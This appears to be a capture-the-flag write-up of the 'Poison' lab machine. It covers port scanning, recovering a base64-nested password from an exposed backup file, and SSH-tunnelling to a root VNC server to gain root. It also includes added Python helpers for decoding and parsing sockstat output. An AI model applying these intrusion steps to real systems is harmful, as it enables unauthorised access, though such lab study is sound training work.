June 6th, saving this to publish later.
1 probe
Starting Nmap 7.60 ( https://nmap.org ) at 2018-06-06 11:31 BST
Nmap scan report for 10.10.10.84
Host is up (0.035s latency).
Not shown: 98 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
I found an info.php with what I assume is the installation date and the users:
FreeBSD Poison 11.1-RELEASE FreeBSD 11.1-RELEASE #0 r321309: Fri Jul 21 02:08:28 UTC 2017 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64
The home page says you can test a series of files:
Sites to be tested: ini.php, info.php, listfiles.php, phpinfo.php
http://10.10.10.84/browse.php?file=listfiles.php shows you that there is a backup:
Array ( [0] => . [1] => .. [2] => browse.php [3] => index.php [4] => info.php [5] => ini.php [6] => listfiles.php [7] => phpinfo.php [8] => pwdbackup.txt )
http://10.10.10.84/pwdbackup.txt shows:
This password is secure, it's encoded atleast 13 times.. what could go wrong really..
Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0 NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO Ukd4RVdub3dPVU5uUFQwSwo=
If you base64-decode it (the trailing = padding gives it away), repeatedly, it gives:
Charix!2#4%6&8(0
We assume that is the password, and it was.
Once in, after grabbing the user flag, you can open the zip file with the same password and it shows:
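The "encoded 13 times" peeling above, as an added worked example that is not part of the original notes. It builds a constructed blob nested 13 times the way the base64 CLI would write it (76-column lines, which is why the page's dump is full of whitespace) and then peels layers until the result stops being valid base64 or stops being printable text. The secret value, the 76-column wrap and the stopping rule are my assumptions; feeding the contents of pwdbackup.txt to peel_base64 is the same procedure.

```python
import base64
import binascii
import re
import string

# Bytes we accept as "still text": any layer of a base64 chain is printable,
# so the first non-printable result means we decoded one step too far.
PRINTABLE = set(string.printable.encode())


def wrap76(data: bytes) -> bytes:
    """Mimic the base64 CLI: 76-column lines, each newline-terminated (assumption)."""
    return b"\n".join(data[i:i + 76] for i in range(0, len(data), 76)) + b"\n"


def encode_layers(secret: bytes, layers: int) -> bytes:
    """Constructed test data: nest `secret` in `layers` rounds of base64."""
    data = secret
    for _ in range(layers):
        data = wrap76(base64.b64encode(data))
    return data


def peel_base64(blob: bytes, max_layers: int = 64):
    """Strip base64 layers until the content is no longer base64 or no longer text.

    Returns (innermost_bytes, layers_removed). Whitespace is removed on every
    round, because the newlines of each inner layer were encoded into the next.
    """
    data = blob
    peeled = 0
    while peeled < max_layers:
        candidate = re.sub(rb"\s+", b"", data)
        if not candidate or len(candidate) % 4:
            break  # wrong length for padded base64: we are at the plaintext
        try:
            decoded = base64.b64decode(candidate, validate=True)
        except binascii.Error:
            break  # characters outside the base64 alphabet, e.g. '!' or '#'
        if not decoded or any(b not in PRINTABLE for b in decoded):
            break  # binary garbage: the previous layer was the real content
        data = decoded
        peeled += 1
    return data.strip(), peeled


if __name__ == "__main__":
    sample_secret = b"Ex4mpl3!P@ss#w0rd"  # constructed, not the box's password
    blob = encode_layers(sample_secret, 13)
    plaintext, layers = peel_base64(blob)
    print(f"{layers} layers removed -> {plaintext!r}")
```

The layer count is returned deliberately: a plaintext that happens to be valid base64 would be decoded one round too many, and comparing the count with the "13 times" hint in the file is the cheap sanity check for that.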
œš[|Õz!
If you type top you can see everything that is running:
PID USERNAME THR PRI NICE SIZE RES STATE TIME WCPU COMMAND
543 root 2 20 0 56320K 5396K select 0:02 0.06% vmtoolsd
793 charix 1 20 0 20160K 3436K RUN 0:00 0.03% top
785 charix 1 20 0 85228K 7900K select 0:00 0.01% sshd
642 root 1 20 0 20636K 6140K select 0:00 0.00% sendmail
625 root 1 20 0 99172K 11516K select 0:00 0.00% httpd
319 root 1 20 0 9560K 5052K select 0:00 0.00% devd
390 root 1 20 0 10500K 2396K select 0:00 0.00% syslogd
529 root 1 20 0 23620K 8872K select 0:00 0.00% Xvnc
540 root 1 33 0 67220K 7064K select 0:00 0.00% xterm
782 root 1 20 0 85228K 7832K select 0:00 0.00% sshd
786 charix 1 20 0 19660K 3624K pause 0:00 0.00% csh
640 www 1 20 0 99M 11896K kqread 0:00 0.00% httpd
650 root 1 20 0 12592K 2436K nanslp 0:00 0.00% cron
620 root 1 20 0 57812K 7052K select 0:00 0.00% sshd
541 root 1 25 0 37620K 5312K select 0:00 0.00% twm
638 www 1 20 0 99M 11896K lockf 0:00 0.00% httpd
641 www 1 20 0 99M 11888K lockf 0:00 0.00% httpd
In this case the interesting part could be the VNC, which I assume can be poisoned and that is why the box is called Poison; let's see. LinEnum: nothing...
Sockstat
charix@Poison:/etc % sockstat
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS
charix sshd 785 3 tcp4 10.10.10.84:22 10.10.14.6:50008
charix sshd 785 4 stream -> ??
root sshd 782 3 tcp4 10.10.10.84:22 10.10.14.6:50008
root sshd 782 5 stream -> ??
smmsp sendmail 646 3 dgram -> /var/run/log
www httpd 645 3 tcp6 *:80 *:*
www httpd 645 4 tcp4 *:80 *:*
root sendmail 642 3 tcp4 127.0.0.1:25 *:*
root sendmail 642 4 dgram -> /var/run/logpriv
www httpd 641 3 tcp6 *:80 *:*
www httpd 641 4 tcp4 *:80 *:*
www httpd 640 3 tcp6 *:80 *:*
www httpd 640 4 tcp4 *:80 *:*
www httpd 639 3 tcp6 *:80 *:*
www httpd 639 4 tcp4 *:80 *:*
www httpd 638 3 tcp6 *:80 *:*
www httpd 638 4 tcp4 *:80 *:*
www httpd 637 3 tcp6 *:80 *:*
www httpd 637 4 tcp4 *:80 *:*
root httpd 625 3 tcp6 *:80 *:*
root httpd 625 4 tcp4 *:80 *:*
root sshd 620 3 tcp6 *:22 *:*
root sshd 620 4 tcp4 *:22 *:*
root twm 541 3 stream -> /tmp/.X11-unix/X1
root xterm 540 3 stream -> /tmp/.X11-unix/X1
root Xvnc 529 0 stream /tmp/.X11-unix/X1
root Xvnc 529 1 tcp4 127.0.0.1:5901 *:*
root Xvnc 529 3 tcp4 127.0.0.1:5801 *:*
root Xvnc 529 4 stream /tmp/.X11-unix/X1
root Xvnc 529 5 stream /tmp/.X11-unix/X1
root syslogd 390 4 dgram /var/run/log
root syslogd 390 5 dgram /var/run/logpriv
root syslogd 390 6 udp6 *:514 *:*
root syslogd 390 7 udp4 *:514 *:*
root devd 319 4 stream /var/run/devd.pipe
root devd 319 5 seqpac /var/run/devd.seqpacket.pipe
root devd 319 7 dgram -> /var/run/logpriv
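Reading a sockstat listing by hand is error-prone, so here is an added example (not part of the original notes) that parses it, keeps only listening sockets, and reports root-owned services bound to loopback. The sample text is a constructed subset of the page's own sockstat output. From a defender's side the point is that a 127.0.0.1 bind is only a network filter: any account that can log in over SSH sits on the same host, so a root VNC server that is "local only" still needs a strong, unshared password and should be in the inventory.

```python
from dataclasses import dataclass

# Constructed sample: a subset of the sockstat output shown in the notes above.
SAMPLE_SOCKSTAT = """\
USER     COMMAND    PID   FD PROTO  LOCAL ADDRESS         FOREIGN ADDRESS
charix   sshd       785   3  tcp4   10.10.10.84:22        10.10.14.6:50008
www      httpd      645   4  tcp4   *:80                  *:*
root     sendmail   642   3  tcp4   127.0.0.1:25          *:*
root     sshd       620   4  tcp4   *:22                  *:*
root     Xvnc       529   1  tcp4   127.0.0.1:5901        *:*
root     Xvnc       529   3  tcp4   127.0.0.1:5801        *:*
root     Xvnc       529   4  stream /tmp/.X11-unix/X1
root     twm        541   3  stream -> /tmp/.X11-unix/X1
root     syslogd    390   7  udp4   *:514                 *:*
"""


@dataclass(frozen=True)
class Listener:
    user: str
    command: str
    pid: int
    proto: str
    addr: str
    port: int

    @property
    def loopback_only(self) -> bool:
        """True when the socket is reachable only from the host itself."""
        return self.addr in ("127.0.0.1", "::1")


def parse_listeners(text: str) -> list[Listener]:
    """Return the listening TCP/UDP sockets from FreeBSD sockstat output.

    Unix-domain sockets (stream/dgram/seqpac) and established connections
    (a concrete FOREIGN ADDRESS instead of *:*) are skipped.
    """
    listeners = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 7 or fields[0] == "USER":
            continue
        user, command, pid, _fd, proto, local, foreign = fields[:7]
        if not proto.startswith(("tcp", "udp")) or foreign != "*:*":
            continue
        addr, _, port = local.rpartition(":")  # handles "*:80" and "127.0.0.1:5901"
        listeners.append(Listener(user, command, int(pid), proto, addr, int(port)))
    return listeners


def loopback_root_services(listeners: list[Listener]) -> list[tuple[str, int]]:
    """(command, port) pairs for root-owned listeners bound to loopback only."""
    return sorted({(l.command, l.port) for l in listeners
                   if l.user == "root" and l.loopback_only})


if __name__ == "__main__":
    found = parse_listeners(SAMPLE_SOCKSTAT)
    for command, port in loopback_root_services(found):
        print(f"root-owned, loopback-only: {command} on port {port}")
```

On the listing above this reports sendmail on 25 and Xvnc on 5801 and 5901; the latter two are exactly what a reviewer of this host should be asking about, since the VNC server runs as root and nothing besides the bind address protects it.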
Port 5901 Details
After several hours, I finally rooted the machine a few minutes ago. What I can add is,
- forget the secret file as long as you don’t know the vulnerable service.
- Once you know what is running, you can google for how to use that service.
- There are tons of walkthroughs on how to setup a particular connection to that service.
Hope this does not reveal too much.
check this:
charix@Poison:/etc % locate Xvnc
/usr/ports/net/tightvnc/files/patch-Xvnc__config__cf__FreeBSD.cf
/usr/ports/net/tightvnc/files/patch-Xvnc__config__cf__Imake.cf
/usr/ports/net/tightvnc/files/patch-Xvnc__config__cf__vnclibs.def
/usr/ports/net/tightvnc/files/patch-Xvnc__config__imake__imakemdep.h
/usr/ports/net/tightvnc/files/patch-Xvnc__include__Xos.h
/usr/ports/net/tightvnc/files/patch-Xvnc__programs__Xserver__dix__Imakefile
/usr/ports/net/tightvnc/files/patch-Xvnc__programs__Xserver__hw__vnc__sockets.c
/usr/ports/net/tightvnc/files/patch-Xvnc__programs__Xserver__hw__xfree86__common__compiler.h
/usr/ports/net/tightvnc/files/patch-Xvnc__programs__Xserver__os__Imakefile
/usr/ports/net/tightvnc/files/patch-Xvnc__programs__Xserver__os__access.c
In another screen:
ssh -L 5901:localhost:5901 [email protected]
unzip secret.zip
root@kali:~# '/root/Downloads/VNC-Viewer-6.17.1113-Linux-x64' 127.0.0.1:5901 -passwd /root/secret
And done, we have root access.
IPPSEC does it more easily: